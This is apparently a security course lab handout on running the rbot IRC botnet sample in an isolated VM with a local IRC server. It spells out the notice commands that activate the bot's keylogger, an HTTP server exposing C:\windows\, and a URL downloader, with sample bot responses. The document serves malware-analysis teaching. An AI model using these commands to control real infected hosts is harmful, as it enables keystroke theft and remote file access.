IDS and Penetration Testing Lab IIIa



Similar documents
Operation Liberpy : Keyloggers and information theft in Latin America

Practice Fusion API Client Installation Guide for Windows

IDS and Penetration Testing Lab III Snort Lab

How to Install and Setup IIS Server

UNMASKCONTENT: THE CASE STUDY

Update central network version

Como configurar o IIS Server para ACTi NVR Enterprise

Trend Micro Worry- Free Business Security st time setup Tips & Tricks

Architecture and Data Flow Overview. BlackBerry Enterprise Service Version: Quick Reference

Cyclope Internet Filtering Proxy. - Installation Guide -

WorldExtend IronDoor 3.5 Publishing a Terminal Services Application

SpamTitan Outlook Addin v1.1 Installation Instructions

Semantic based Web Application Firewall (SWAF - V 1.6)

User Manual. User Manual Version

Installation Troubleshooting Guide

Learn More MaaS360 Cloud Extender Checklist (MDM for Blackberry)

JMETER - MONITOR TEST PLAN

Accessing the Online Meeting Room (Blackboard Collaborate)

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka

Service Overview & Installation Guide

Setting Up One Search

Multifaceted Approach to Understanding the Botnet Phenomenon

freesshd SFTP Server on Windows

Netwatch Installation For Windows

Fixing Problems with IP Phone Services

ITA Mail Archive Setup Guide

Quick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at

Installing GFI LANguard Network Security Scanner

Networks and Security Lab. Network Forensics

DESLock+ Basic Setup Guide Version 1.20, rev: June 9th 2014

Shellfire L2TP-IPSec Setup Windows XP

Spam Marshall SpamWall Step-by-Step Installation Guide for Exchange 5.5

Monitoring Oracle Enterprise Performance Management System Release Deployments from Oracle Enterprise Manager 12c

Contents. Before You Install Server Installation Configuring Print Audit Secure... 10

Millennium Drive. Installation Guide

Volume SYSLOG JUNCTION. User s Guide. User s Guide

Cyclope Internet Filtering Proxy

idatafax Troubleshooting

Installing GFI Network Server Monitor

Browser Client 2.0 Admin Guide

Digital Certificate IP Address Test Procedure

Send Video Recordings from the DVR to a FTP Server on your PC

Setting cron job Linux/Unix operating systems using command-line interface

Installing and Trouble-Shooting SmartSystems

Step by Step: vcenter Syslog Collector installation

WatchGuard SSL v3.2 Update 1 Release Notes. Introduction. Windows 8 and 64-bit Internet Explorer Support. Supported Devices SSL 100 and 560

Instructions for update installation of ElsaWin 5.00

MFPConnect Monitoring. Monitoring with IPCheck Server Monitor. Integration Manual Version Edition 1

SAP CRM on SAP HANA Getting Started Today with 9 Easy Steps. May 2014

Quick Reference Guide: Business Mail

Hosted Connecting Steps Client Installation Instructions

1 Recommended Readings. 2 Resources Required. 3 Compiling and Running on Linux

Utility Snapshot Utility V2.1. User s Manual

Guide to the LBaaS plugin ver for Fuel

Configuring Cisco CallManager IP Phones to Work With IP Phone Agent

Install and configure SSH server

SecureVault Online Backup Service Client Installation Guide

DEPLOYING EMC DOCUMENTUM BUSINESS ACTIVITY MONITOR SERVER ON IBM WEBSPHERE APPLICATION SERVER CLUSTER

VPN SOFTWARE - WINDOWS XP & WINDOWS 64-BIT INSTALLATION AND CONFIGURATION INSTRUCTIONS

ACTi NVR Config Converter User s Manual. Version /06/07

Central Administration QuickStart Guide

REQUIREMENTS AND INSTALLATION OF THE NEFSIS DEDICATED SERVER

700 Fox Glen Barrington, Illinois ph: [847] fx: [847]

PRODUCT VERSION: LYNC SERVER 2010, LYNC SERVER 2013, WINDOWS SERVER 2008

TIBCO Slingshot User Guide

VMware Horizon Toolbox 2.0 Guide VMware End User Computing 2015 November

Remote Terminal Service (RTS) User Guide (Version 2.1)

SysAidTM Freeware Installation Guide

Manual niwis SEP Event Monitor NSEPEM. English

IBM WEBSPHERE LOAD BALANCING SUPPORT FOR EMC DOCUMENTUM WDK/WEBTOP IN A CLUSTERED ENVIRONMENT

Capture Pro Software FTP Server System Output

IBM WebSphere Application Server V8.5 lab Basic Liberty profile administration using the job manager

Quickstart guide to Configuring WebTitan

Demo of Data transferring (.CSV Files) from EGX300 to Our local PC/Laptop using- FTP

Setting Up SSL on IIS6 for MEGA Advisor

5. At the Windows Component panel, select the Internet Information Services (IIS) checkbox, and then hit Next.

Snow Active Directory Discovery

Configuring MassTransit Server to listen on ports less than 1024 using WaterRoof on Macintosh Workstations

escan SBS 2008 Installation Guide

Configuring Load Balancing

Web DLP Quick Start. To get started with your Web DLP policy

Configure Backup Server for Cisco Unified Communications Manager

Web DLP Quick Start. To get started with your Web DLP policy

Implementing Microsoft SQL Server 2008 Exercise Guide. Database by Design

Reporting Installation Checklist

How to set FTP Server (IIS)

LICENSE4J FLOATING LICENSE SERVER USER GUIDE

How to Configure Active Directory based User Authentication

How To - Implement Single Sign On Authentication with Active Directory

CTI Concerto Predictive Dialer Setup Instructions. Version 4

Resilient Botnet Command and Control with Tor

DIGIPASS Pack for Citrix on WI 4.5 does not detect a login attempt. Creation date: 28/02/2008 Last Review: 04/03/2008 Revision number: 2

Administration Guide. . All right reserved. For more information about Specops Gpupdate and other Specops products, visit

XenApp/Citrix Program Neighborhood Installation

Exchange Outlook Profile/POP/IMAP/SMTP Setup Guide

Prepared by Mythtech Limited OFFICE 365 MIGRATION MANUAL GUIDELINE

The anatomy of an online banking fraud

How-to setup a proxy in the cloud

Apache JMeter HTTP(S) Test Script Recorder

Creating the AM.NET IIS Web folders

Transcription:

IDS and Penetration Testing Lab IIIa Dissecting a Botnet C&C - rbot Triggering Lab Malware operation Upon execution malware connects to botirc.net server and establishes standard IRC session with #test channel (PASS, NICK, USER). Typically malware registers itself with the following nick: [M]bBot XXXX, (where XXXX are random 4 digits). After establishing the session, malware enters an infinite loop that receives IRC messages, interprets commands and executes them. Via the commands, malware provides three main functionalities such as keylogger, http server and downloader. Experiment setup To run and trigger rbot malware, it is required to have IRC server and client and provide connectivity from malware to IRC server. In the setup demonstrated in the class, malware was executed in Windows XP SP2 VM (disconnected from Internet). This VM also runs local IRC server using bewareircd utility. To control the bot instance we run a simple IRC client using mirc utility. Since malware connects IRC server named as Botirc.net, we need to resolve it locally by adding a corresponding entry in %SYSTEMROOT%\system32\drivers\etc\hosts file. Such as 127.0.0.1 Botirc.net. Using this configuration, one can perform the following steps to activate rbot instance: 1. Run IRC server (c:\distr\bewareircd-win32\bircd.exe). It will create local IRC server ready to host new servers and channels 2. Setup mirc client. a. Start the client b. Create New IRC server (press Add, then specify Botirc.net any ID (e.g. r_bot_server_test)). This will register IRC server named Botirc.net :

c. Double click on created server: d. Enter #test channel and click Join. This will start IRC session.

e. Now you can run rbot(bbot) and you should see that it joined the session. You can send commands that given in the next section. Welcome to rbot C&C! Commands triggering To activate a component/functionality of the bot one need to send a certain notice message to the bot instance over the IRC channel. The table bellow presents the required format of IRC commands. Functionality/ Component Keylogger IRC command Command to malware: /notice bot_instance_nick keylog file Result Malware creates a thread that traces current window focus and pressed keys using hookless technique (i.e. GetAssyncKeyState based). The traced keys and context data is

Example: /notice [M]bBot 4842 keylog file stored in c:\windows\system32\key.txt Response from malware (if successful): [KEYLOG]: Key logger active. HTTP server Command to malware: /notice bot_instance_nick httpserver port path Malware starts a http server that listens to (port) and provides access to the specified directory (path). Example: /notice [M]bBot 4842 httpserver 1235 C:\windows\ Example response from malware (if successful): [HTTPD]: Server listening on IP: 127.0.0.1:1235, Directory: C:\windows\. Downloader Command to malware: /notice bot_instance_nick d0wnl04d URL target_file Malware downloads a file from the specified URL to a specified file on the victim host.

Example: /notice [M]bBot 9497 d0wnl04d http://gmail.com/gmail.htm c:\gmail_copy.htm Example response from malware (if successful): [DOWNLOAD]: Downloading URL: http://gmail.com/gmail.htm to: c:\gmail_copy.htm. [DOWNLOAD]: Downloaded 57.8 KB to c:\gmail_copy.htm @ 57.8 KB/sec. Examples Keylogger

The bellow figures show screenshots of successful keylogger activation. The first figure shows typical response from the malware to keylogger command. The second screen shows the log file (c:\windows\system32\key.txt). HTTP server The bellow figures show screenshots of successful http server activation.

Downloader The bellow figures show screenshots of successful http server activation.

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information